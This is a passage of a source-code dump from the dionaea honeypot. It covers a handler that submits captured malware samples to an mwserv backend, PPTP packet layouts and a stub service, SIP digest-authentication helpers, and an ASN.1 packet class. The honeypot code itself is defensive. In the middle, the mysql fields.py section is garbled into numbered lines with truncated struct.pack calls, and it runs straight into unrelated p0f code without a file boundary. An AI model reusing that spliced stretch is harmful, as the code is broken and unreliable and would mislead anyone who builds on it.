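import uuid

logger = logging.getLogger('mwserv')
logger.setLevel(logging.DEBUG)


class mwserv_report:
    """Per-sample state kept between the submit request and its result
    callback; stored in mwservhandler.cookies under a random cookie."""

    def __init__(self, sha512h, filepath):
        self.sha512h, self.filepath = sha512h, filepath
        self.saddr, self.sport, self.daddr, self.dport = ('', )*4
        self.download_url = ''


def _read_result(icd):
    """Return the backend's response body stored at icd.path.

    The file handle is closed again; the previous version opened it and
    never closed it, leaking one descriptor per backend reply.
    """
    with open(icd.path, mode="rb") as fh:
        return fh.read()


class mwservhandler(ihandler):
    """Submits captured samples to an mwserv backend and sends periodic
    heartbeats.

    Every request carries the configured maintainer / guid / secret as
    attributes of a dionaea.upload.request incident; the transport is done
    by whoever services that incident, so the configured backend url should
    be an https one to keep the secret off the wire in clear.
    """

    def __init__(self, path):
        logger.debug("%s ready!" % (self.__class__.__name__))
        ihandler.__init__(self, path)
        mwsconfig = g_dionaea.config()['modules']['python']['mwserv']
        self.backendurl = mwsconfig['url']
        self.maintainer = mwsconfig['maintainer']
        self.guid = mwsconfig['guid']
        self.secret = mwsconfig['secret']
        # cookie -> mwserv_report for submissions awaiting a backend reply
        self.cookies = {}

        # heartbeats
        dinfo = g_dionaea.version()
        self.software = 'dionaea {0} {1}/{2} - {3} {4}'.format(
            dinfo['dionaea']['version'],
            dinfo['compiler']['os'],
            dinfo['compiler']['arch'],
            dinfo['compiler']['date'],
            dinfo['compiler']['time'],
        )
        self.loop = pyev.default_loop()
        # first beat after 5 s, then every 120 s
        self.heartbeat_timer = pyev.Timer(5., 120, self.loop, self._heartbeat)
        self.heartbeat_timer.start()

    def stop(self):
        self.heartbeat_timer.stop()
        self.heartbeat_timer = None
        self.loop = None

    def _request(self, path):
        """New upload incident for the backend path, auth fields filled in."""
        i = incident("dionaea.upload.request")
        i._url = self.backendurl + path
        i.maintainer = self.maintainer
        i.guid = self.guid
        i.secret = self.secret
        return i

    def _heartbeat(self, events, data):
        logger.info("mwserv _heartbeat")
        i = self._request('heartbeat')
        i.software = self.software
        i._callback = "dionaea.modules.python.mwserv.heartbeatresult"
        i.report()

    def handle_incident(self, icd):
        pass

    def handle_incident_dionaea_download_complete_unique(self, icd):
        """Announce a sample by hash; the backend replies via the result
        callback whether it wants the file itself."""
        cookie = str(uuid.uuid4())

        i = self._request('nepenthes/submit')
        i.sha512 = sha512file(icd.file)

        mr = mwserv_report(i.sha512, icd.file)

        if hasattr(icd, 'con'):
            i.saddr = icd.con.remote.host
            i.sport = str(icd.con.remote.port)
            i.daddr = icd.con.local.host
            i.dport = str(icd.con.local.port)
            mr.saddr, mr.sport, mr.daddr, mr.dport = i.saddr, i.sport, i.daddr, i.dport
        if hasattr(icd, 'url'):
            i.url = icd.url
            mr.download_url = icd.url

        i._callback = "dionaea.modules.python.mwserv.result"
        i._userdata = cookie

        self.cookies[cookie] = mr
        i.report()

    # handle agains in the same way
    handle_incident_dionaea_download_complete_again = handle_incident_dionaea_download_complete_unique

    def handle_incident_dionaea_modules_python_mwserv_result(self, icd):
        c = _read_result(icd)
        logger.info("mwserv result: {0}".format(c))

        cookie = icd._userdata
        mr = self.cookies.get(cookie)
        if mr is None:
            # a reply we have no record of (e.g. after a restart) must not
            # raise out of the callback
            logger.warning("mwserv result for unknown cookie %s, ignoring" % (cookie,))
            return

        # does backend want us to upload?  (plain substring test: any reply
        # body containing UNKNOWN triggers the upload)
        if b'UNKNOWN' in c:
            i = self._request('nepenthes/submit')
            i.sha512 = mr.sha512h

            i.set('file://data', mr.filepath)

            i.saddr = mr.saddr
            i.sport = mr.sport
            i.daddr = mr.daddr
            i.dport = mr.dport
            i.url = mr.download_url

            i._callback = "dionaea.modules.python.mwserv.uploadresult"
            i._userdata = cookie

            i.report()
        else:
            del self.cookies[cookie]

    def handle_incident_dionaea_modules_python_mwserv_uploadresult(self, icd):
        c = _read_result(icd)
        logger.info("mwserv uploadresult: {0}".format(c))

        # tolerate an unknown cookie here as well
        self.cookies.pop(icd._userdata, None)

    def handle_incident_dionaea_modules_python_mwserv_heartbeatresult(self, icd):
        c = _read_result(icd)
        logger.info("mwserv heartbeatresult: {0}".format(c))

# --------------------------------------------------------------------------------
# /modules/python/scripts/mysql/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mysql/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/mysql/include/__init__.py:
# https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/mysql/include/__init__.py
# --------------------------------------------------------------------------------
# /modules/python/scripts/mysql/include/fields.py: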
#******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2011 Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.smb.include.fieldtypes import * 30 | 31 | class Int24Field(IntField): 32 | def __init__(self, name, default): 33 | IntField.__init__(self,name,default) 34 | def i2len(self, pkt, i): 35 | return 3 36 | def i2m(self, pkt, y): 37 | return struct.pack("> 8, (y&0xff0000) >> 16) 38 | def m2i(self, pkt, x): 39 | (l,m,h) = struct.unpack(" 0 and y < 250: 118 | l = struct.pack("= 2.0.8 50 | data = pack("III4s4sHH", 51 | 0x0defaced, # p0f magic 52 | 1, # type 53 | 0xffffffff, # id 54 | inet_aton(self.con.remote.host),# remote host 55 | inet_aton(self.con.local.host), # local host 56 | self.con.remote.port, # remote port 57 | self.con.local.port) # local port 58 | else: 59 | # p0f < 2.0.8 60 | data = pack("=II4s4sHH", 61 | 0x0defaced, # p0f magic 62 | 0xffffffff, # type 63 | inet_aton(self.con.remote.host),# remote host 64 | 
inet_aton(self.con.local.host), # local host 65 | self.con.remote.port, # remote port 66 | self.con.local.port) # local port 67 | 68 | self.send(data) 69 | 70 | def handle_io_in(self, data): 71 | fmt = "IIB20s40sB30s30sBBBhHi" 72 | if len(data) != calcsize(fmt): 73 | return 0 74 | values = unpack(fmt, data) 75 | names=["magic","id","type","genre","detail","dist","link","tos","fw","nat","real","score","mflags","uptime"] 76 | icd = incident(origin='dionaea.modules.python.p0f') 77 | for i in range(len(values)): 78 | s = values[i] 79 | if type(s) == bytes: 80 | if s.find(b'\x00'): 81 | s = s[:s.find(b'\x00')] 82 | icd.set(names[i], s) 83 | elif type(s) == int: 84 | icd.set(names[i], str(s)) 85 | icd.set('con',self.con) 86 | icd.report() 87 | self.close() 88 | return len(data) 89 | 90 | def handle_disconnect(self): 91 | self.con.unref() 92 | return 0 93 | 94 | def handle_error(self, err): 95 | self.con.unref() 96 | 97 | class p0fhandler(ihandler): 98 | def __init__(self, p0fpath): 99 | logger.debug("p0fHandler") 100 | ihandler.__init__(self, 'dionaea.connection.*') 101 | self.p0fpath = p0fpath 102 | 103 | def handle_incident(self, icd): 104 | if icd.origin == 'dionaea.connection.tcp.accept' or icd.origin == 'dionaea.connection.tls.accept' or icd.origin == 'dionaea.connection.tcp.reject': 105 | logger.debug("p0f action") 106 | # icd.dump() 107 | con = icd.get('con') 108 | p = p0fconnection(self.p0fpath, con) 109 | 110 | 111 | 112 | 113 | # p0f = p0fHandler('un:///tmp/p0f.sock') 114 | -------------------------------------------------------------------------------- /modules/python/scripts/pptp/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/pptp/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/pptp/include/__init__.py: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/pptp/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/pptp/include/packets.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2015 Tan Kean Siong 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/

from dionaea.smb.include.packet import *
from dionaea.smb.include.fieldtypes import *

#PPTP Control Message Types
PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST = 0x01
PPTP_CTRMSG_TYPE_STARTCTRCON_REPLY = 0x02
PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST = 0x07
PPTP_CTRMSG_TYPE_OUTGOINGCALL_REPLY = 0x08

#PPP Link Control Protocol Types
# NOTE(review): the class PPP_LCP_Configuration_Request defined at the bottom
# of this file rebinds this module-level name.  Inside that class body the
# name still resolves to 0x01 (a class is bound only after its body has
# run), but any later reference to the constant gets the class instead.
PPP_LCP_Configuration_Request = 0x01

# https://www.ietf.org/rfc/rfc2637.txt
# Control-message layouts.  Request classes carry zero defaults because they
# are only used to dissect what the client sent; Reply classes carry the
# values we answer with.
class PPTP_StartControlConnection_Request(Packet):
    name="PPTP Start-Control-Connection-Request"
    controlmessage_type = PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST
    # NOTE(review): two fields share the name "Reserved"; depending on how
    # packet.py resolves names the second may be unreachable by name.  Left
    # as is because renaming changes the field interface -- verify.
    fields_desc =[
        XShortField("Length",0),
        XShortField("MessageType",0),
        XIntField("MagicCookie",0),
        XShortField("ControlMessageType",0),
        XShortField("Reserved",0),
        XShortField("ProtocolVersion",0),
        XShortField("Reserved",0),

        XIntField("FramingCapabilites",0),
        XIntField("BearerCapabilites",0),
        XShortField("MaxChannels",0),
        XShortField("FirmwareRevision",0),
        StrFixedLenField("HostName", "", 64),
        StrFixedLenField("VendorName", "", 64),
    ]

class PPTP_StartControlConnection_Reply(Packet):
    name="PPTP Start-Control-Connection-Reply"
    controlmessage_type = PPTP_CTRMSG_TYPE_STARTCTRCON_REPLY
    fields_desc =[
        # 0x9c = 156 bytes, the fixed size of this message
        XShortField("Length",0x9c),
        XShortField("MessageType",0x01),
        # RFC 2637 magic cookie
        XIntField("MagicCookie",0x1a2b3c4d),
        XShortField("ControlMessageType",0x02),
        XShortField("Reserved",0),
        # NOTE(review): little-endian 0x01 puts the bytes 01 00 on the wire,
        # i.e. protocol version 0x0100 (1.0) read big-endian; presumably the
        # LE field types in this reply are a deliberate way to emit those
        # byte patterns -- confirm before "fixing" them.
        LEShortField("ProtocolVersion",0x01),
        # ResultCode 1: successful channel establishment
        ByteField("ResultCode",0x01),
        ByteField("ErrorCode",0x00),
        LEIntField("FramingCapabilites",0),
        LEIntField("BearerCapabilites",0),
        XShortField("MaxChannels",1),
        XShortField("FirmwareRevision",1),
        StrFixedLenField("HostName", "", 64),
        StrFixedLenField("VendorName", "", 64),
    ]

class PPTP_OutgoingCall_Request(Packet):
    name="PPTP Outgoing-Call-Request"
    controlmessage_type = PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST
    # NOTE(review): same duplicate "Reserved" field name as in the
    # Start-Control-Connection-Request above.
    fields_desc =[
        XShortField("Length",0),
        XShortField("MessageType",0),
        XIntField("MagicCookie",0),
        XShortField("ControlMessageType",0),
        XShortField("Reserved",0),
        XShortField("CallID",0),
        XShortField("CallSerialNumber",0),
        XIntField("MinBPS",0),
        XIntField("MaxBPS",0),
        XIntField("BearerType",0),
        XIntField("FramingType",0),
        XShortField("PacketWindowSize",0),
        XShortField("PacketProcessingDelay",0),
        XShortField("PacketNumberLength",0),
        XShortField("Reserved",0),
        StrFixedLenField("PhoneNumber", "", 64),
        StrFixedLenField("Subaddress", "", 64),
    ]

class PPTP_OutgoingCall_Reply(Packet):
    name="PPTP Outgoing-Call-Reply"
    controlmessage_type = PPTP_CTRMSG_TYPE_OUTGOINGCALL_REPLY
    fields_desc =[
        # 0x20 = 32 bytes, the fixed size of this message
        XShortField("Length",0x20),
        XShortField("MessageType",0x01),
        XIntField("MagicCookie",0x1a2b3c4d),
        XShortField("ControlMessageType",0x08),
        XShortField("Reserved",0),
        # fixed call id we hand out; PeerCallID stays 0 unless the caller
        # fills it from the request
        XShortField("CallID",0x480),
        XShortField("PeerCallID",0),
        ByteField("ResultCode",0x01),
        ByteField("ErrorCode",0x00),
        XShortField("CauseCode",0),
        # 0x05F5E100 = 100 000 000 bps advertised connect speed
        XIntField("ConnectSpeed",0x05F5E100),
        XShortField("PacketWindowSize",0x2000),
        XShortField("PacketProcessingDelay",0),
        XShortField("PacketNumberLength",0),
        XShortField("PhysicalChannelID",0),
    ]

class PPTP(Packet):
    # NOTE(review): Address/Control/Protocol is the shape of an HDLC-framed
    # PPP header rather than a PPTP control header; the class name looks
    # misleading -- verify against pptp.py before relying on it.
    name="PPTP"
    fields_desc =[
        ByteField("Address",0),
        ByteField("Control",0),
        XShortField("Protocol",0),
    ]

class PPP_LCP_Configuration_Request(Packet):
    name="PPP LCP_Configuration_Request"
    # evaluated while the module-level constant (0x01) is still bound, see
    # the note at the constant's definition
    controlmessage_type = PPP_LCP_Configuration_Request
    fields_desc =[
        ByteField("Code",0),
| ByteField("Identifier",0), 139 | XShortField("Length",0), 140 | StrFixedLenField("Options", b"", length_from=lambda pkt: pkt.Length-4), 141 | ] 142 | 143 | -------------------------------------------------------------------------------- /modules/python/scripts/pptp/pptp.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2015 Tan Kean Siong 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
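#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/

from dionaea.core import *

import datetime
import traceback
import logging
import binascii
import os
import tempfile

from dionaea.pptp.include.packets import *

logger = logging.getLogger('pptp')

# Reads of this many bytes or fewer are not treated as a complete control
# message (the two request types we understand are both longer).  Such reads
# are left unconsumed so the connection layer hands them back once more data
# has arrived, instead of dispatching a truncated header.
PPTP_MIN_CTRL_LEN = 100


class pptpd(connection):
    """
    Minimal PPTP (RFC 2637) control-connection service.

    Only Start-Control-Connection-Request and Outgoing-Call-Request are
    understood; each is answered with the canned reply packet from
    dionaea.pptp.include.packets.  The hostname the client announces in its
    Start-Control-Connection-Request is reported as a
    ``dionaea.modules.python.pptp.connect`` incident.
    """

    def __init__(self):
        connection.__init__(self, "tcp")
        self.buf = b''
        # ControlMessageType of the last header parsed; None until the first
        # complete message arrives (the original left it unset, so a short
        # first read raised AttributeError in handle_io_in).
        self.pendingPacketType = None

    def handle_established(self):
        self.timeouts.idle = 120
        self.processors()

    def handle_io_in(self, data):
        """
        Parse one PPTP control message from ``data`` and answer it.

        Assumes one control message per read; the Length header field is only
        sanity-checked, not used to split multiple messages.

        :param data: bytes received from the peer (untrusted)
        :return: number of bytes consumed; 0 leaves ``data`` buffered so the
                 next call sees it again together with newer data
        """
        if len(data) <= PPTP_MIN_CTRL_LEN:
            logger.warning("PPTP Packet, Length <= {}".format(PPTP_MIN_CTRL_LEN))
            return 0

        try:
            # Every control message starts with the same header (Length,
            # MessageType, MagicCookie, ControlMessageType), so the
            # Start-Control-Connection-Request layout is used to peek at it.
            p = PPTP_StartControlConnection_Request(data)
            p.show()

            if p.Length == 0:
                logger.warning("Bad PPTP Packet, Length = 0")
                return 0

            self.pendingPacketType = p.ControlMessageType
            msg_type = self.pendingPacketType

            if msg_type == PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST:
                x = PPTP_StartControlConnection_Request(data)

                # The client volunteers its hostname and vendor here; the
                # hostname is reported so it can be used for fingerprinting
                # clients.  It is a raw 64-byte field straight from the wire.
                i = incident("dionaea.modules.python.pptp.connect")
                i.con = self
                logger.debug("pptp remote hostname: {0} ".format(x.HostName))
                i.remote_hostname = x.HostName
                i.report()

            elif msg_type == PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST:
                x = PPTP_OutgoingCall_Request(data)

                # FIXME after this the client switches to GRE-encapsulated PPP
                # traffic, which dionaea cannot handle yet.

            else:
                # Previously an unknown type fell through to x.show() with
                # x == None and crashed the handler; drop the message instead.
                logger.warning("UNKNOWN PACKET TYPE FOR PPTP {}".format(msg_type))
                return len(data)

        except Exception:
            logger.critical(traceback.format_exc())
            return 0

        self.buf = b''
        x.show()

        r = self.process(msg_type, x)
        if r:
            r.show()
            self.send(r.build())

        return len(data)

    def process(self, PacketType, p):
        """
        Build the canned reply for control message type ``PacketType``.

        :param PacketType: value of the ControlMessageType header field
        :param p: the parsed request packet (not inspected; kept for callers)
        :return: a reply packet, or a falsy value for unknown message types
        """
        replies = {
            PPTP_CTRMSG_TYPE_STARTCTRCON_REQUEST: PPTP_StartControlConnection_Reply,
            PPTP_CTRMSG_TYPE_OUTGOINGCALL_REQUEST: PPTP_OutgoingCall_Reply,
        }
        reply_cls = replies.get(PacketType)
        if reply_cls is None:
            logger.warning("UNKNOWN PACKET TYPE FOR PPTP {}".format(PacketType))
            return None
        return reply_cls()

    def handle_timeout_idle(self):
        return False

    def handle_disconnect(self):
        return False


# ---------------------------------------------------------------------------
# /modules/python/scripts/sip/rfc2617.py
# ---------------------------------------------------------------------------
"""
RFC2617

:See: http://tools.ietf.org/html/rfc2617

"""

import hashlib
import hmac
import re


def quote(data):
    """
    Quote a string
    >>> print(quote(b'test'), quote(b'"test'), quote(b'test"'), quote(b'"test"'))
    b'"test"' b'"test"' b'"test"' b'"test"'
    >>> quote(b'')
    b'""'
    """
    if isinstance(data, str):
        data = bytes(data, "utf-8")

    data = data.strip()
    # Empty input used to raise IndexError on data[0]; an empty quoted
    # string is the sensible result.
    if not data:
        return b'""'

    if not data.startswith(b'"'):
        data = b'"' + data

    if not data.endswith(b'"'):
        data = data + b'"'

    return data


def unquote(data):
    """
    Unquote a string
    >>> print(unquote(b'test'), unquote(b'"test'), unquote(b'test"'), unquote(b'"test"'))
    b'test' b'test' b'test' b'test'
    >>> unquote(b'')
    b''
    """
    if isinstance(data, str):
        data = bytes(data, "utf-8")

    data = data.strip()
    if data.startswith(b'"'):
        data = data[1:]

    if data.endswith(b'"'):
        data = data[:-1]

    return data


class Authentication(object):
    """
    >>> a = Authentication(method = "basic", realm = "test")
    >>> print(a.dumps())
    b'Basic realm="test"'
    >>> a = Authentication(method = "digest", realm = "test", domain = "example.org", algorithm = "md5", nonce = "abcd")
    >>> print(a.dumps())
    b'Digest realm="test", domain="example.org", algorithm=MD5, nonce="abcd"'
    >>> a = Authentication.froms(b'Digest realm="test", algorithm="MD5", nonce="efgh", domain="example.org"')
    >>> print(a.method, a.algorithm, a.domain, a.nonce, a.realm)
    b'digest' b'MD5' b'example.org' b'efgh' b'test'
    """
    # Parameter names accepted by loads(); anything else in a header is
    # dropped, so client-chosen names never reach __init__ through froms().
    _quote = ["realm", "domain", "nonce", "response", "uri"]
    _noquote = ["algorithm"]

    def __init__(self, method = "basic", realm = None, domain = None, algorithm = None, nonce = None, response = None, uri = None):
        self.method = method
        self.realm = realm
        self.domain = domain
        self.algorithm = algorithm
        self.nonce = nonce
        self.response = response
        self.uri = uri

    def check(self, username, password, method, auth):
        """
        Verify the Digest ``response`` a client sent (``auth``, parsed from its
        Authorization header) against ``password`` for ``username``.

        The nonce and realm come from this object (the challenge the server
        issued); uri and response come from ``auth``.  Only plain MD5 is
        computed: loads() does not parse cnonce, so MD5-sess cannot be
        checked here.

        :return: True iff the response matches
        """
        if auth is None or not auth.response:
            return False
        # Without an issued nonce/realm there is nothing to verify against.
        if self.nonce is None or self.realm is None:
            return False

        digest = create_digest(
            algorithm = "md5",
            method = method,
            nonce = self.nonce,
            password = password,
            realm = self.realm,
            uri = auth.uri,
            username = username
        )

        expected = auth.response
        if isinstance(expected, str):
            expected = bytes(expected, "utf-8")

        # Constant-time comparison: a plain == leaks how many leading bytes
        # of a guessed response were right.
        return hmac.compare_digest(digest, expected)

    def dumps(self):
        """
        Serialise as a WWW-Authenticate / Authorization header value (bytes).

        ``method`` may be the str used by callers or the bytes produced by
        loads(); both select the Digest form.
        """
        if self.method in ("digest", b"digest"):
            ret = []
            for n in ["realm", "domain", "uri", "algorithm", "nonce", "response"]:
                v = getattr(self, n)
                if v is None:
                    continue

                if n == "algorithm":
                    v = v.upper()

                if n in self._quote:
                    v = quote(v)

                if n in self._noquote:
                    v = unquote(v)

                ret.append(bytes(n, "utf-8") + b"=" + v)

            return b"Digest " + b", ".join(ret)

        realm = self.realm if self.realm is not None else ""
        return b"Basic realm=" + quote(realm)

    @classmethod
    def froms(cls, data):
        """Build an Authentication from a header value (see loads())."""
        return cls(**cls.loads(data)[1])

    @classmethod
    def loads(cls, data):
        """
        Parse a header value such as ``Digest realm="x", nonce="y"``.

        :param data: str or bytes header value
        :return: (len(data), dict) where the dict holds the lower-cased
                 method plus only the parameters listed in _quote/_noquote
        """
        l = len(data)
        if isinstance(data, str):
            data = bytes(data, "utf-8")

        # b" +" rather than b" *": since Python 3.7 re.split() also splits on
        # empty matches, so the original pattern returned an empty method and
        # the whole header as the remainder.  A value without any space
        # (bare method) yields an empty parameter list instead of an
        # unpacking error.
        head = re.split(b" +", data.strip(), 1)
        method = head[0]
        params = head[1] if len(head) > 1 else b""

        ret = {
            "method": method.lower()
        }

        for part in re.split(b" *, *", params):
            n, s, v = part.partition(b"=")
            # Names are matched against the whitelist only, so undecodable
            # bytes are simply replaced and then ignored.
            n = n.decode("utf-8", "replace")
            if n in cls._quote:
                ret[n] = unquote(v)
            if n in cls._noquote:
                # these values shouldn't be quoted, but nevertheless some clients do it
                ret[n] = unquote(v)

        return (l, ret)


# :See: http://tools.ietf.org/html/rfc2617#page-10
def H(d):
    """RFC 2617 H(data): lower-case hex MD5 digest, as bytes."""
    return bytes(hashlib.md5(d).hexdigest(), "utf-8")


def KD(secret, data):
    """RFC 2617 KD(secret, data) = H(secret ":" data)."""
    return H(secret + b":" + data)


def create_digest(algorithm = None, cnonce = None, method = None, nonce = None, password = None, realm = None, uri = None, username = None):
    """
    >>> print(create_digest(algorithm = "md5", method = "REGISTER", nonce = "foobar", password = "secret", realm = "sip-server", uri = "sip:sip-server", username = "alice"))
    b'8b30552864468e5e6ab1eb2b87d1b92f'

    Compute the Digest ``response`` value (no qop, RFC 2617 section 3.2.2.1).
    str arguments are encoded as UTF-8.

    :raises TypeError: if a required value is None, or if ``algorithm`` is
                       MD5-sess and no ``cnonce`` was given
    """
    def _b(v):
        return bytes(v, "utf-8") if isinstance(v, str) else v

    algorithm, cnonce, method, nonce = _b(algorithm), _b(cnonce), _b(method), _b(nonce)
    password, realm, uri, username = _b(password), _b(realm), _b(uri), _b(username)

    for name, value in (("method", method), ("nonce", nonce), ("password", password),
                        ("realm", realm), ("uri", uri), ("username", username)):
        if value is None:
            raise TypeError("create_digest: {} must not be None".format(name))

    # :See: http://tools.ietf.org/html/rfc2617#page-13
    # Compared as bytes: the original compared the (bytes) algorithm with the
    # str 'md5-sess', which can never be equal, so MD5-sess requests were
    # silently hashed as plain MD5.
    if algorithm and algorithm.lower() == b'md5-sess':
        if cnonce is None:
            raise TypeError("create_digest: md5-sess requires a cnonce")
        A1 = H(username + b":" + realm + b":" + password) + b":" + nonce + b":" + cnonce
    else:
        A1 = username + b":" + realm + b":" + password

    A2 = method + b":" + uri

    return KD(H(A1), nonce + b":" + H(A2))


if __name__ == '__main__':
    import doctest
    doctest.testmod()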
-------------------------------------------------------------------------------- /modules/python/scripts/smb/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/smb/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gento/dionaea/bb40f46c5547c6d4d918eb5ee05573de8f7f07df/modules/python/scripts/smb/include/__init__.py -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | # We do not import mib.py because it is more bound to scapy and 7 | # less prone to be used in a standalone fashion 8 | __all__ = ["asn1","ber"] 9 | -------------------------------------------------------------------------------- /modules/python/scripts/smb/include/asn1packet.py: -------------------------------------------------------------------------------- 1 | #******************************************************************************** 2 | #* Dionaea 3 | #* - catches bugs - 4 | #* 5 | #* 6 | #* 7 | #* Copyright (C) 2010 Markus Koetter 8 | #* 9 | #* This program is free software; you can redistribute it and/or 10 | #* modify it under the terms of the GNU General Public License 11 | #* as published by the Free Software Foundation; either version 2 12 | #* of the License, or (at your option) any later version. 
#*
#* This program is distributed in the hope that it will be useful,
#* but WITHOUT ANY WARRANTY; without even the implied warranty of
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#* GNU General Public License for more details.
#*
#* You should have received a copy of the GNU General Public License
#* along with this program; if not, write to the Free Software
#* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#*
#*
#* contact nepenthesdev@gmail.com
#*
#*******************************************************************************/
#* This file was part of Scapy
#* See http://www.secdev.org/projects/scapy for more information
#* Copyright (C) Philippe Biondi
#* This program is published under a GPLv2 license
#*******************************************************************************


from .packet import *


class ASN1_Packet(Packet):
    """
    Packet whose layout is described by an ASN.1 object tree rather than a
    fields_desc list.

    Subclasses set ASN1_root (the tree object; it must provide
    get_fields_list(), build() and dissect()) and ASN1_codec.  Building and
    dissection are delegated to ASN1_root.
    """
    ASN1_root = None
    ASN1_codec = None

    def init_fields(self):
        # Derive fields_desc from the ASN.1 tree and initialise them as a
        # regular Packet would.
        field_list = self.ASN1_root.get_fields_list()
        self.do_init_fields(field_list)
        self.fields_desc = field_list

    def do_build(self):
        # Serialisation is entirely the tree's job.
        return self.ASN1_root.build(self)

    def do_dissect(self, x):
        # Parsing of raw bytes ``x`` is likewise delegated to the tree.
        return self.ASN1_root.dissect(self, x)


# ---------------------------------------------------------------------------
# /modules/python/scripts/store.py
# ---------------------------------------------------------------------------
#********************************************************************************
#* Dionaea
#* - catches bugs -
#*
#*
#*
#* Copyright (C) 2009 Paul Baecher & Markus Koetter
#*
#* This program is free software; you can redistribute it and/or
#* modify it under the terms of the GNU General Public License
#* as published by the Free Software Foundation; either version 2
#* of the License, or (at
your option) any later version. 13 | #* 14 | #* This program is distributed in the hope that it will be useful, 15 | #* but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | #* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | #* GNU General Public License for more details. 18 | #* 19 | #* You should have received a copy of the GNU General Public License 20 | #* along with this program; if not, write to the Free Software 21 | #* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 22 | #* 23 | #* 24 | #* contact nepenthesdev@gmail.com 25 | #* 26 | #*******************************************************************************/ 27 | 28 | 29 | from dionaea.core import ihandler, incident, g_dionaea 30 | from dionaea.util import md5file 31 | 32 | import os 33 | import logging 34 | logger = logging.getLogger('store') 35 | logger.setLevel(logging.DEBUG) 36 | 37 | 38 | class storehandler(ihandler): 39 | def __init__(self, path): 40 | logger.debug("%s ready!" 
